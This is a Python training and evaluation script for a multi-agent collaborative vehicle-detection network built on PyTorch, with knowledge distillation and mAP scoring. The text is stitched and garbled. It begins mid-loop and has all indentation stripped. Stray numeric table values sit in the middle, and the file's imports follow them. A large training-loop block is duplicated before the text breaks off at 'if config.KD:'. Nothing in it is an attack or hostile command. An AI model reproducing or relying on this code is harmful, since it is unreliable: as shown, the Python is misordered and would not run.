padded_voxel_points4, padded_voxel_points_teacher4, label_one_hot4, reg_target4, reg_loss_mask4, anchors_map4, vis_maps4, target_agent_id4, num_sensor4, trans_matrices4, filename4 = sample[4]['padded_voxel_points'] ,sample[4]['padded_voxel_points_teacher'] ,sample[4]['label_one_hot'] ,sample[4]['reg_target'] ,sample[4]['reg_loss_mask'] ,sample[4]['anchors_map'] ,sample[4]['vis_maps'] ,sample[4]['target_agent_id'] ,sample[4]['num_sensor'] ,sample[4]['trans_matrices'], sample[4]['filename']
center_agent = sample['center_agent']
time_t1 = time.time()
print("计时点1", time_t1 - time_t0)
padded_voxel_points_list = [padded_voxel_points0, padded_voxel_points1, padded_voxel_points2, padded_voxel_points3, padded_voxel_points4]
label_one_hot_list = [label_one_hot0, label_one_hot1, label_one_hot2, label_one_hot3, label_one_hot4]
reg_target_list = [reg_target0, reg_target1, reg_target2, reg_target3, reg_target4]
reg_loss_mask_list = [reg_loss_mask0, reg_loss_mask1, reg_loss_mask2, reg_loss_mask3, reg_loss_mask4]
anchors_map_list = [anchors_map0, anchors_map1, anchors_map2, anchors_map3, anchors_map4]
vis_maps_list = [vis_maps0, vis_maps1, vis_maps2, vis_maps3, vis_maps4]
time_t2 = time.time()
print("计时点2", time_t2 - time_t1)
padded_voxel_points = torch.cat(tuple(padded_voxel_points_list), 0)# 因为以前是tensor的list 所以可以
label_one_hot = torch.cat(tuple(label_one_hot_list), 0)
reg_target = torch.cat(tuple(reg_target_list), 0)
reg_loss_mask = torch.cat(tuple(reg_loss_mask_list), 0)
anchors_map = torch.cat(tuple(anchors_map_list), 0)
vis_maps = torch.cat(tuple(vis_maps_list), 0)
time_t3 = time.time()
print("计时点3", time_t3 - time_t2)
target_agent_id_list = [target_agent_id0, target_agent_id1, target_agent_id2, target_agent_id3, target_agent_id4]
num_agent_list = [num_sensor0[-1], num_sensor1[-1], num_sensor2[-1], num_sensor3[-1], num_sensor4[-1]]
trans_matrices_list = [trans_matrices0, trans_matrices1, trans_matrices2, trans_matrices3, trans_matrices4]
trans_matrices = torch.stack(tuple(trans_matrices_list), 1) #
target_agent_ids = torch.stack(tuple(target_agent_id_list), 1)
num_agent = torch.stack(tuple(num_agent_list), 1)
time_t4 = time.time()
print("计时点4", time_t4 - time_t3)
data = {}
data['file_name'] = [filename0, filename1, filename2, filename3, filename4]
data['bev_seq'] = padded_voxel_points.to(device)
time_t5_0 = time.time()
print("计时点5_0", time_t5_0 - time_t4)
data['labels'] = label_one_hot.to(device)
data['reg_targets'] = reg_target.to(device)
data['anchors'] = anchors_map.to(device)
data['reg_loss_mask'] = reg_loss_mask.to(device).type(dtype=torch.bool)
data['vis_maps'] = vis_maps.to(device)
time_t5_1 = time.time()
print("计时点5_1", time_t5_1 - time_t5_0)
data['target_agent_ids'] = target_agent_ids.to(device)
data['num_agent'] = num_agent.to(device)
data['trans_matrices'] = trans_matrices
time_8 = time.time()
time_c = time_8- time_10
time_t5 = time.time()
print("计时点5", time_t5 - time_t4)
print("数据读取时间", time_c)
print("从loader到网络", time_8-trainset.time_4)
time_9 = time.time()
if config.KD:
padded_voxel_points_list_teacher = [padded_voxel_points_teacher0, padded_voxel_points_teacher1, padded_voxel_points_teacher2, padded_voxel_points_teacher3, padded_voxel_points_teacher4]
padded_voxel_points_teacher = torch.cat(tuple(padded_voxel_points_list_teacher), 0)
data['bev_seq_teacher'] = padded_voxel_points_teacher.to(device)
data['kd_weight'] = args.kd
data['layer'] = layer
if config.KD:
loss, cls_loss, loc_loss,kd_loss = fafmodule.step(data, batch_size, center_agent)
else:
loss, cls_loss, loc_loss = fafmodule.step(data, batch_size, center_agent, forcast_num)
running_loss_disp.update(loss)
running_loss_class.update(cls_loss)
running_loss_loc.update(loc_loss)
time_10 = time.time()
print("total_time:", time_10 - time_9)
step_ct += 1
print("\nEpoch {}, Step {}".format(epoch, step_ct))
print("Running total loss: {}".format(running_loss_disp.avg))
print("Running total cls loss: {}".format(running_loss_class.avg))
print("Running total loc loss: {}".format(running_loss_loc.avg))
print("{}\t{}\t{}\t Takes {} s\n".format(running_loss_disp, running_loss_class, running_loss_loc,
str(time.time() - t)))
# save model
if need_log:
if config.KD:
saver.write("{}\t{}\t{}\tkd loss:{} Take {} s\n".format(running_loss_disp,running_loss_class,running_loss_loc,kd_loss,str(time.time()-t)))
else:
saver.write("{}\t{}\t{}\tTake {} s\n".format(running_loss_disp,running_loss_class,running_loss_loc,str(time.time()-t)))
saver.flush()
if config.MGDA:
save_dict = {'epoch': epoch,
'encoder_state_dict': fafmodule.encoder.state_dict(),
'optimizer_encoder_state_dict': fafmodule.optimizer_encoder.state_dict(),
'scheduler_encoder_state_dict': fafmodule.scheduler_encoder.state_dict(),
'head_state_dict': fafmodule.head.state_dict(),
'optimizer_head_state_dict': fafmodule.optimizer_head.state_dict(),
'scheduler_head_state_dict': fafmodule.scheduler_head.state_dict(),
'loss': running_loss_disp.avg}
else:
save_dict = {'epoch': epoch,
'model_state_dict': fafmodule.model.state_dict(),
'optimizer_state_dict': fafmodule.optimizer.state_dict(),
'scheduler_state_dict': fafmodule.scheduler.state_dict(),
'loss': running_loss_disp.avg}
torch.save(save_dict, os.path.join(model_save_path, 'epoch_' + str(epoch) + '.pth'))
elif args.mode == 'val':
# model_save_path = model_save_path + '/epoch_' + str(start_epoch - 1)
# check_folder(model_save_path)
# save_fig_path0 = os.path.join(model_save_path, 'vis_result_agent0')
# save_fig_path1 = os.path.join(model_save_path, 'vis_result_agent1')
# save_fig_path2 = os.path.join(model_save_path, 'vis_result_agent2')
# save_fig_path3 = os.path.join(model_save_path, 'vis_result_agent3')
# save_fig_path4 = os.path.join(model_save_path, 'vis_result_agent4')
# check_folder(save_fig_path0)
# check_folder(save_fig_path1)
# check_folder(save_fig_path2)
# check_folder(save_fig_path3)
# check_folder(save_fig_path4)
# save_fig_path = [save_fig_path0, save_fig_path1, save_fig_path2, save_fig_path3, save_fig_path4]
if config.MGDA:
fafmodule.encoder.eval()
fafmodule.head.eval()
else:
fafmodule.model.eval()
running_loss_disp = AverageMeter('Total loss', ':.6f') # for motion prediction error
running_loss_class = AverageMeter('classification Loss', ':.6f') # for cell classification error
running_loss_loc = AverageMeter('Localization Loss', ':.6f') # for state estimation error
# for local and global mAP evaluation
det_results_local = [[] for i in range(5)]
annotations_local = [[] for i in range(5)]
# for sample0, sample1, sample2, sample3, sample4 in zip(valloader0, valloader1, valloader2, valloader3,
# valloader4):
for sample in valloader:
t = time.time()
center_agent = sample['center_agent']
padded_voxel_points0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, gt_max_iou0, filename0, \
target_agent_id0, num_sensor0, trans_matrices0, padded_voxel_points_global, reg_target_global, anchors_map_global, gt_max_iou_global, trans_matrices_map = sample[0]['padded_voxel_points'] ,sample[0]['label_one_hot'] ,sample[0]['reg_target'] ,sample[0]['reg_loss_mask'] ,sample[0]['anchors_map'] ,sample[0]['vis_maps'], sample[0]['gt_max_iou'], sample[0]['filename'], sample[0]['target_agent_id'] ,sample[0]['num_sensor'] ,sample[0]['trans_matrices'],sample[0]['padded_voxel_points_global'],sample[0]['reg_target_global'],sample[0]['anchors_map_global'],sample[0]['gt_max_iou_global'],sample[0]['trans_matrices_map']
padded_voxel_points1, label_one_hot1, reg_target1, reg_loss_mask1, anchors_map1, vis_maps1, gt_max_iou1, filename1, target_agent_id1, num_sensor1, trans_matrices1, _, _, _, _, _ = sample[1]['padded_voxel_points'], sample[1]['label_one_hot'] ,sample[1]['reg_target'] ,sample[1]['reg_loss_mask'] ,sample[1]['anchors_map'] ,sample[1]['vis_maps'], sample[1]['gt_max_iou'], sample[1]['filename'], sample[1]['target_agent_id'] ,sample[1]['num_sensor'] ,sample[1]['trans_matrices'],sample[1]['padded_voxel_points_global'],sample[1]['reg_target_global'],sample[1]['anchors_map_global'],sample[1]['gt_max_iou_global'],sample[1]['trans_matrices_map']
padded_voxel_points2, label_one_hot2, reg_target2, reg_loss_mask2, anchors_map2, vis_maps2, gt_max_iou2, filename2, target_agent_id2, num_sensor2, trans_matrices2, _, _, _, _, _ = sample[2]['padded_voxel_points'], sample[2]['label_one_hot'] ,sample[2]['reg_target'] ,sample[2]['reg_loss_mask'] ,sample[2]['anchors_map'] ,sample[2]['vis_maps'], sample[2]['gt_max_iou'], sample[2]['filename'], sample[2]['target_agent_id'] ,sample[2]['num_sensor'] ,sample[2]['trans_matrices'],sample[2]['padded_voxel_points_global'],sample[2]['reg_target_global'],sample[2]['anchors_map_global'],sample[2]['gt_max_iou_global'],sample[2]['trans_matrices_map']
padded_voxel_points3, label_one_hot3, reg_target3, reg_loss_mask3, anchors_map3, vis_maps3, gt_max_iou3, filename3, target_agent_id3, num_sensor3, trans_matrices3, _, _, _, _, _ = sample[3]['padded_voxel_points'] ,sample[3]['label_one_hot'] ,sample[3]['reg_target'] ,sample[3]['reg_loss_mask'] ,sample[3]['anchors_map'] ,sample[3]['vis_maps'], sample[3]['gt_max_iou'], sample[3]['filename'], sample[3]['target_agent_id'] ,sample[3]['num_sensor'] ,sample[3]['trans_matrices'],sample[3]['padded_voxel_points_global'],sample[3]['reg_target_global'],sample[3]['anchors_map_global'],sample[3]['gt_max_iou_global'],sample[3]['trans_matrices_map']
padded_voxel_points4, label_one_hot4, reg_target4, reg_loss_mask4, anchors_map4, vis_maps4, gt_max_iou4, filename4, target_agent_id4, num_sensor4, trans_matrices4, _, _, _, _, _ = sample[4]['padded_voxel_points'],sample[4]['label_one_hot'] ,sample[4]['reg_target'] ,sample[4]['reg_loss_mask'] ,sample[4]['anchors_map'] ,sample[4]['vis_maps'], sample[4]['gt_max_iou'], sample[4]['filename'], sample[4]['target_agent_id'] ,sample[4]['num_sensor'] ,sample[4]['trans_matrices'],sample[4]['padded_voxel_points_global'],sample[4]['reg_target_global'],sample[4]['anchors_map_global'],sample[4]['gt_max_iou_global'],sample[4]['trans_matrices_map']
padded_voxel_points_list = [padded_voxel_points0, padded_voxel_points1, padded_voxel_points2,
padded_voxel_points3, padded_voxel_points4]
label_one_hot_list = [label_one_hot0, label_one_hot1, label_one_hot2, label_one_hot3, label_one_hot4]
reg_target_list = [reg_target0, reg_target1, reg_target2, reg_target3, reg_target4]
reg_loss_mask_list = [reg_loss_mask0, reg_loss_mask1, reg_loss_mask2, reg_loss_mask3, reg_loss_mask4]
anchors_map_list = [anchors_map0, anchors_map1, anchors_map2, anchors_map3, anchors_map4]
vis_maps_list = [vis_maps0, vis_maps1, vis_maps2, vis_maps3, vis_maps4]
gt_max_iou = [gt_max_iou0, gt_max_iou1, gt_max_iou2, gt_max_iou3, gt_max_iou4]
target_agent_id_list = [target_agent_id0, target_agent_id1, target_agent_id2, target_agent_id3,
target_agent_id4]
num_agent_list = [num_sensor0, num_sensor1, num_sensor2, num_sensor3, num_sensor4]
trans_matrices_list = [trans_matrices0, trans_matrices1, trans_matrices2, trans_matrices3, trans_matrices4]
trans_matrices = torch.stack(tuple(trans_matrices_list), 1) #
target_agent_ids = torch.stack(tuple(target_agent_id_list), 1)
num_agent = torch.stack(tuple(num_agent_list), 1)
padded_voxel_points = torch.cat(tuple(padded_voxel_points_list), 0)
label_one_hot = torch.cat(tuple(label_one_hot_list), 0)
reg_target = torch.cat(tuple(reg_target_list), 0)
reg_loss_mask = torch.cat(tuple(reg_loss_mask_list), 0)
anchors_map = torch.cat(tuple(anchors_map_list), 0)
vis_maps = torch.cat(tuple(vis_maps_list), 0)
data = {}
data['bev_seq'] = padded_voxel_points.to(device)
data['labels'] = label_one_hot.to(device)
data['reg_targets'] = reg_target.to(device)
data['anchors'] = anchors_map.to(device)
data['vis_maps'] = vis_maps.to(device)
data['reg_loss_mask'] = reg_loss_mask.to(device).type(dtype=torch.bool)
data['target_agent_ids'] = target_agent_ids.to(device)
data['num_agent'] = num_agent.to(device)
data['trans_matrices'] = trans_matrices
loss, cls_loss, loc_loss, result = fafmodule.predict_all(data, 1, True, center_agent)
# local qualitative evaluation
for k in range(num_sensor0):
data_agents = {}
data_agents['bev_seq'] = torch.unsqueeze(padded_voxel_points[k, :, :, :, :], 1)
data_agents['reg_targets'] = torch.unsqueeze(reg_target[k, :, :, :, :, :], 0)
data_agents['anchors'] = torch.unsqueeze(anchors_map[k, :, :, :, :], 0)
temp = gt_max_iou[k]
data_agents['gt_max_iou'] = temp[0]['gt_box'][0, :, :]
result_temp = result[k]
temp = {'bev_seq': data_agents['bev_seq'][0, -1].cpu().numpy(), 'result': result_temp[0][0],
'reg_targets': data_agents['reg_targets'].cpu().numpy()[0],
'anchors_map': data_agents['anchors'].cpu().numpy()[0],
'gt_max_iou': data_agents['gt_max_iou']}
det_results_local[k], annotations_local[k] = cal_local_mAP(config, temp, det_results_local[k],
annotations_local[k])
filename = str(filename0[0][0])
cut = filename[filename.rfind('agent') + 7:]
seq_name = cut[:cut.rfind('_')]
idx = cut[cut.rfind('_') + 1:cut.rfind('/')]
# seq_save = os.path.join(save_fig_path[k], seq_name)
# check_folder(seq_save)
idx_save = str(idx) + '.png'
# if args.visualization:
# visualization(config, temp, os.path.join(seq_save, idx_save))
print("Validation scene {}, at frame {}".format(seq_name, idx))
running_loss_disp.update(loss)
running_loss_class.update(cls_loss)
running_loss_loc.update(loc_loss)
print("{}\t{}\t{}\t Takes {} s\n".format(running_loss_disp, running_loss_class, running_loss_loc,
str(time.time() - t)))
print("Quantitative evaluation results of model from {}, at epoch {}".format(args.resume, start_epoch - 1))
log_results_file = args.logname + '.txt'
saver_val = open(log_results_file,'w')
det_results_all_local = det_results_local[0] + det_results_local[1] + det_results_local[2] + det_results_local[3]
annotations_all_local = annotations_local[0] + annotations_local[1] + annotations_local[2] + annotations_local[3]
saver_val.write('\noverall local results@iou0.5\n')
mean_ap_local_average, _ = eval_map(det_results_all_local,annotations_all_local,scale_ranges=None,iou_thr=0.5,dataset=None,logger=None)
print(mean_ap_local_average)
saver_val.write(str(mean_ap_local_average))
saver_val.write('\noverall local results@iou0.7\n')
mean_ap_local_average, _ = eval_map(det_results_all_local,annotations_all_local,scale_ranges=None,iou_thr=0.7,dataset=None,logger=None)
print(mean_ap_local_average)
saver_val.write(str(mean_ap_local_average))
#local mAP evaluation
for k in range(4):
saver_val.write('\nlocal{} results@iou0.5\n'.format(k+1))
mean_ap, _ = eval_map(det_results_local[k],annotations_local[k],scale_ranges=None,iou_thr=0.5,dataset=None,logger=None)
print(mean_ap)
saver_val.write(str(mean_ap))
saver_val.write('\nlocal{} results@iou0.7\n'.format(k+1))
mean_ap, _ = eval_map(det_results_local[k],annotations_local[k],scale_ranges=None,iou_thr=0.7,dataset=None,logger=None)
print(mean_ap)
saver_val.write(str(mean_ap))
else:
print('Not implemented yet.')
if need_log:
saver.close()
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', default=None, type=str, help='The path to the preprocessed sparse BEV training data')
parser.add_argument('--resume', default='', type=str, help='The path to the saved model that is loaded to resume training')
parser.add_argument('--resume_teacher', default='/DATA_SSD/slren/teacher_aug_batch_4_epoch_100.pth', type=str, help='The path to the saved teacher model that is loaded to resume training')
parser.add_argument('--kd', default=100000, type=float, help='kd_weight')
parser.add_argument('--model_only', action='store_true', help='only load model')
parser.add_argument('--batch', default=2, type=int, help='Batch size')
parser.add_argument('--nepoch', default=100, type=int, help='Number of epochs')
parser.add_argument('--layer', default=3, type=int, help='Communicate which layer')
parser.add_argument('--nworker', default=0, type=int, help='Number of workers')
parser.add_argument('--lr', default=0.001, type=float, help='Initial learning rate')
parser.add_argument('--log', action='store_true', help='Whether to log')
parser.add_argument('--logpath', default='./log', help='The path to the output log file')
parser.add_argument('--mode', default=None, help='Train/Val mode')
parser.add_argument('--visualization', default=True, help='Visualize validation result')
parser.add_argument('--binary', default=True, type=bool, help='Only detect car')
parser.add_argument('--only_det', default=True, type=bool, help='Only do detection')
parser.add_argument('--logname', default=None, type=str, help='log the detection performance')
parser.add_argument('--forcast_num', default=4, type=int, help='How many frames do you want to use in forcast')
parser.add_argument('--rank', default=0, type=int, help='node rank for distributed training')
parser.add_argument('--ngpus_per_node', default=2, type=int)
parser.add_argument('--gpu', default=2, type=int, help='GPU id to use.')
torch.multiprocessing.set_sharing_strategy('file_system')
args = parser.parse_args()
print(args)
config = Config('train', binary=args.binary, only_det=args.only_det)
config_global = ConfigGlobal('train', binary=args.binary, only_det=args.only_det)
# mp.spawn(main_worker, nprocs=args.ngpus_per_node, args=([args.ngpus_per_node, config, config_global], args))
main(config, config_global, args)
| 64.276018
| 652
| 0.639962
|
from utils.model import forcast_lstm
import random
import torch
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.nn.parallel import DistributedDataParallel as DDP
import torch.distributed as dist
import torch.multiprocessing as mp
import numpy as np
import time
import sys
import argparse
import os
from shutil import copytree, copy
from utils.model import MotionNet
from utils.FaFModule import *
from utils.loss import *
from data.data_com_parallel import NuscenesDataset, CarscenesDataset
from data.config_com import Config, ConfigGlobal
from utils.mean_ap import eval_map
from tqdm import tqdm
class AverageMeter(object):
def __init__(self, name, fmt=':f'):
self.name = name
self.fmt = fmt
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def __str__(self):
fmtstr = '{name} {val' + self.fmt + '} ({avg' + self.fmt + '})'
return fmtstr.format(**self.__dict__)
def check_folder(folder_path):
if not os.path.exists(folder_path):
os.mkdir(folder_path)
return folder_path
def main(config, config_global, args):
num_epochs = args.nepoch
need_log = args.log
num_workers = args.nworker
only_load_model = args.model_only
forcast_num = args.forcast_num
start_epoch = 1
layer = args.layer
batch_size = args.batch
os.environ['MASTER_ADDR'] = 'localhost'
os.environ['MASTER_PORT'] = '5678'
dist.init_process_group(backend='nccl',rank=1,world_size=2)
    torch.cuda.set_device(2)
    device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
if args.mode == 'train':
if need_log:
logger_root = args.logpath if args.logpath != '' else 'logs'
time_stamp = time.strftime("%Y-%m-%d_%H-%M-%S")
if args.resume == '':
model_save_path = check_folder(logger_root)
model_save_path = check_folder(os.path.join(model_save_path, 'train_single_seq'))
model_save_path = check_folder(os.path.join(model_save_path, time_stamp))
log_file_name = os.path.join(model_save_path, 'log.txt')
saver = open(log_file_name, "w")
saver.write("GPU number: {}\n".format(torch.cuda.device_count()))
saver.flush()
saver.write("command line: {}\n".format(" ".join(sys.argv[0:])))
saver.write(args.__repr__() + "\n\n")
saver.flush()
copytree('nuscenes-devkit', os.path.join(model_save_path, 'nuscenes-devkit'))
copytree('data', os.path.join(model_save_path, 'data'))
python_files = [f for f in os.listdir('.') if f.endswith('.py')]
for f in python_files:
copy(f, model_save_path)
else:
model_save_path = args.resume[:args.resume.rfind('/')]
torch.load(args.resume)
log_file_name = os.path.join(model_save_path, 'log.txt')
saver = open(log_file_name, "a")
saver.write("GPU number: {}\n".format(torch.cuda.device_count()))
saver.flush()
saver.write("command line: {}\n".format(" ".join(sys.argv[1:])))
saver.write(args.__repr__() + "\n\n")
saver.flush()
data_nuscenes = NuscenesDataset(dataset_root=args.data + '/agent0', split='train', config=config)
padded_voxel_points_example, label_one_hot_example, reg_target_example, reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example = data_nuscenes[0]
trainset = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
dataset_root=args.data, config=config, config_global=config_global, agent_list = ['/agent0', '/agent1', '/agent2', '/agent3', '/agent4'],
split='train', forcast_num = forcast_num)
print("Training dataset size:", len(trainset))
if args.mode == 'val':
data_nuscenes = NuscenesDataset(dataset_root=args.data + '/agent0', config=config, split='val', val=True)
padded_voxel_points_example, label_one_hot_example, reg_target_example, reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example, _, _ = data_nuscenes[0]
valset = CarscenesDataset(padded_voxel_points_example, label_one_hot_example, reg_target_example,
reg_loss_mask_example, \
anchors_map_example, motion_one_hot_example, motion_mask_example, vis_maps_example,
dataset_root=args.data, config=config, config_global=config_global, agent_list = ['/agent0', '/agent1', '/agent2', '/agent3', '/agent4'],
split='val', val=True)
valloader = torch.utils.data.DataLoader(valset, batch_size=1, shuffle=False, num_workers=1)
print("Validation dataset size:", len(valset))
if config.MGDA:
encoder = FeatEncoder()
encoder = nn.DataParallel(encoder)
encoder = encoder.to(device)
optimizer_encoder = optim.Adam(encoder.parameters(), lr=args.lr)
head = FaFMGDA(config)
head = nn.DataParallel(head)
head = head.to(device)
optimizer_head = optim.Adam(head.parameters(), lr=args.lr)
model = [encoder, head]
optimizer = [optimizer_encoder, optimizer_head]
elif config.MIMO:
if layer == 0:
model = FaFMIMONet_32_256_256(config)
elif layer == 1:
model = FaFMIMONet_64_128_128(config)
elif layer == 2:
if config.KD:
model = FaFMIMONet_128_64_64_KD(config)
else:
model = FaFMIMONet_128_64_64(config)
elif layer == 3:
if config.KD:
model = FaFMIMONet_256_32_32_KD(config)
else:
model = FaFMIMONet_256_32_32(config)
            model = DDP(model, device_ids=[args.rank])
else:
if config.KD:
model = FaFMIMONet_512_16_16_KD(config)
else:
model = FaFMIMONet_512_16_16(config)
model = nn.DataParallel(model)
model = model.to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
else:
model = FaFNet(config)
model = nn.DataParallel(model)
model = model.to(device)
optimizer = optim.Adam(model.parameters(), lr=args.lr)
criterion = {'cls': SoftmaxFocalClassificationLoss(), 'loc': WeightedSmoothL1LocalizationLoss()}
if config.KD:
teacher = FaFNet(config)
teacher = nn.DataParallel(teacher)
teacher = teacher.to(device)
fafmodule = FaFModuleKD(model, teacher, config, optimizer, criterion)
checkpoint_teacher = torch.load(args.resume_teacher)
start_epoch_teacher = checkpoint_teacher['epoch']
fafmodule.teacher.load_state_dict(checkpoint_teacher['model_state_dict'])
print("Load teacher model from {}, at epoch {}".format(args.resume_teacher, start_epoch_teacher))
else:
fafmodule = FaFModule(model, config, optimizer, criterion)
if args.resume != '' or args.mode == 'val':
checkpoint = torch.load(args.resume)
model_save_path = args.resume[:args.resume.rfind('/')]
start_epoch = checkpoint['epoch'] + 1
if only_load_model:
start_epoch = 0
if config.MGDA:
fafmodule.encoder.load_state_dict(checkpoint['encoder_state_dict'])
fafmodule.head.load_state_dict(checkpoint['head_state_dict'])
if not only_load_model:
fafmodule.scheduler_encoder.load_state_dict(checkpoint['scheduler_encoder_state_dict'])
fafmodule.optimizer_encoder.load_state_dict(checkpoint['optimizer_encoder_state_dict'])
fafmodule.scheduler_head.load_state_dict(checkpoint['scheduler_head_state_dict'])
fafmodule.optimizer_head.load_state_dict(checkpoint['optimizer_head_state_dict'])
else:
fafmodule.model.load_state_dict(checkpoint['model_state_dict'])
if not only_load_model:
fafmodule.scheduler.load_state_dict(checkpoint['scheduler_state_dict'])
fafmodule.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
print("Load model from {}, at epoch {}".format(args.resume, start_epoch - 1))
if args.mode == 'train':
n_train = len(trainset)
indices = list(range(n_train))
data_cache = {}
for epoch in range(start_epoch, num_epochs + 1):
latency_num = (epoch - 100) / 10
latency_lambda = [latency_num, latency_num, latency_num, latency_num, latency_num]
print('latency of this epoch is', latency_lambda)
if config.MGDA:
lr = fafmodule.optimizer_head.param_groups[0]['lr']
else:
lr = fafmodule.optimizer.param_groups[0]['lr']
print("Epoch {}, learning rate {}".format(epoch, lr))
if need_log:
saver.write("epoch: {}, lr: {}\t".format(epoch, lr))
saver.flush()
running_loss_disp = AverageMeter('Total loss', ':.6f')
running_loss_class = AverageMeter('classification Loss', ':.6f')
running_loss_loc = AverageMeter('Localization Loss', ':.6f')
if config.MGDA:
fafmodule.scheduler_encoder.step()
fafmodule.encoder.train()
fafmodule.scheduler_head.step()
fafmodule.head.train()
else:
fafmodule.scheduler.step()
fafmodule.model.train()
step_ct = 1
t = time.time()
train_sampler = torch.utils.data.distributed.DistributedSampler(trainset)
            trainloader = torch.utils.data.DataLoader(trainset, batch_size=batch_size, shuffle=False, sampler=train_sampler, num_workers=num_workers)  # DistributedSampler yields single indices, so pass it via sampler=, not batch_sampler=
time_10 = time.time()
for sample in tqdm(trainloader):
time_t0 = time.time()
print("返回时间", time_t0 - trainset.time_4)
padded_voxel_points0, padded_voxel_points_teacher0, label_one_hot0, reg_target0, reg_loss_mask0, anchors_map0, vis_maps0, target_agent_id0, num_sensor0, trans_matrices0, filename0 = sample[0]['padded_voxel_points'] ,sample[0]['padded_voxel_points_teacher'] ,sample[0]['label_one_hot'] ,sample[0]['reg_target'] ,sample[0]['reg_loss_mask'] ,sample[0]['anchors_map'] ,sample[0]['vis_maps'] ,sample[0]['target_agent_id'] ,sample[0]['num_sensor'] ,sample[0]['trans_matrices'], sample[0]['filename']
padded_voxel_points1, padded_voxel_points_teacher1, label_one_hot1, reg_target1, reg_loss_mask1, anchors_map1, vis_maps1, target_agent_id1, num_sensor1, trans_matrices1, filename1 = sample[1]['padded_voxel_points'] ,sample[1]['padded_voxel_points_teacher'] ,sample[1]['label_one_hot'] ,sample[1]['reg_target'] ,sample[1]['reg_loss_mask'] ,sample[1]['anchors_map'] ,sample[1]['vis_maps'] ,sample[1]['target_agent_id'] ,sample[1]['num_sensor'] ,sample[1]['trans_matrices'], sample[1]['filename']
padded_voxel_points2, padded_voxel_points_teacher2, label_one_hot2, reg_target2, reg_loss_mask2, anchors_map2, vis_maps2, target_agent_id2, num_sensor2, trans_matrices2, filename2 = sample[2]['padded_voxel_points'] ,sample[2]['padded_voxel_points_teacher'] ,sample[2]['label_one_hot'] ,sample[2]['reg_target'] ,sample[2]['reg_loss_mask'] ,sample[2]['anchors_map'] ,sample[2]['vis_maps'] ,sample[2]['target_agent_id'] ,sample[2]['num_sensor'] ,sample[2]['trans_matrices'], sample[2]['filename']
padded_voxel_points3, padded_voxel_points_teacher3, label_one_hot3, reg_target3, reg_loss_mask3, anchors_map3, vis_maps3, target_agent_id3, num_sensor3, trans_matrices3, filename3 = sample[3]['padded_voxel_points'] ,sample[3]['padded_voxel_points_teacher'] ,sample[3]['label_one_hot'] ,sample[3]['reg_target'] ,sample[3]['reg_loss_mask'] ,sample[3]['anchors_map'] ,sample[3]['vis_maps'] ,sample[3]['target_agent_id'] ,sample[3]['num_sensor'] ,sample[3]['trans_matrices'], sample[3]['filename']
padded_voxel_points4, padded_voxel_points_teacher4, label_one_hot4, reg_target4, reg_loss_mask4, anchors_map4, vis_maps4, target_agent_id4, num_sensor4, trans_matrices4, filename4 = sample[4]['padded_voxel_points'] ,sample[4]['padded_voxel_points_teacher'] ,sample[4]['label_one_hot'] ,sample[4]['reg_target'] ,sample[4]['reg_loss_mask'] ,sample[4]['anchors_map'] ,sample[4]['vis_maps'] ,sample[4]['target_agent_id'] ,sample[4]['num_sensor'] ,sample[4]['trans_matrices'], sample[4]['filename']
center_agent = sample['center_agent']
time_t1 = time.time()
print("计时点1", time_t1 - time_t0)
padded_voxel_points_list = [padded_voxel_points0, padded_voxel_points1, padded_voxel_points2, padded_voxel_points3, padded_voxel_points4]
label_one_hot_list = [label_one_hot0, label_one_hot1, label_one_hot2, label_one_hot3, label_one_hot4]
reg_target_list = [reg_target0, reg_target1, reg_target2, reg_target3, reg_target4]
reg_loss_mask_list = [reg_loss_mask0, reg_loss_mask1, reg_loss_mask2, reg_loss_mask3, reg_loss_mask4]
anchors_map_list = [anchors_map0, anchors_map1, anchors_map2, anchors_map3, anchors_map4]
vis_maps_list = [vis_maps0, vis_maps1, vis_maps2, vis_maps3, vis_maps4]
time_t2 = time.time()
print("计时点2", time_t2 - time_t1)
padded_voxel_points = torch.cat(tuple(padded_voxel_points_list), 0)
label_one_hot = torch.cat(tuple(label_one_hot_list), 0)
reg_target = torch.cat(tuple(reg_target_list), 0)
reg_loss_mask = torch.cat(tuple(reg_loss_mask_list), 0)
anchors_map = torch.cat(tuple(anchors_map_list), 0)
vis_maps = torch.cat(tuple(vis_maps_list), 0)
time_t3 = time.time()
print("计时点3", time_t3 - time_t2)
target_agent_id_list = [target_agent_id0, target_agent_id1, target_agent_id2, target_agent_id3, target_agent_id4]
num_agent_list = [num_sensor0[-1], num_sensor1[-1], num_sensor2[-1], num_sensor3[-1], num_sensor4[-1]]
trans_matrices_list = [trans_matrices0, trans_matrices1, trans_matrices2, trans_matrices3, trans_matrices4]
trans_matrices = torch.stack(tuple(trans_matrices_list), 1)
target_agent_ids = torch.stack(tuple(target_agent_id_list), 1)
num_agent = torch.stack(tuple(num_agent_list), 1)
time_t4 = time.time()
print("计时点4", time_t4 - time_t3)
data = {}
data['file_name'] = [filename0, filename1, filename2, filename3, filename4]
data['bev_seq'] = padded_voxel_points.to(device)
time_t5_0 = time.time()
print("计时点5_0", time_t5_0 - time_t4)
data['labels'] = label_one_hot.to(device)
data['reg_targets'] = reg_target.to(device)
data['anchors'] = anchors_map.to(device)
data['reg_loss_mask'] = reg_loss_mask.to(device).type(dtype=torch.bool)
data['vis_maps'] = vis_maps.to(device)
time_t5_1 = time.time()
print("计时点5_1", time_t5_1 - time_t5_0)
data['target_agent_ids'] = target_agent_ids.to(device)
data['num_agent'] = num_agent.to(device)
data['trans_matrices'] = trans_matrices
time_8 = time.time()
time_c = time_8- time_10
time_t5 = time.time()
print("计时点5", time_t5 - time_t4)
print("数据读取时间", time_c)
print("从loader到网络", time_8-trainset.time_4)
time_9 = time.time()
if config.KD:
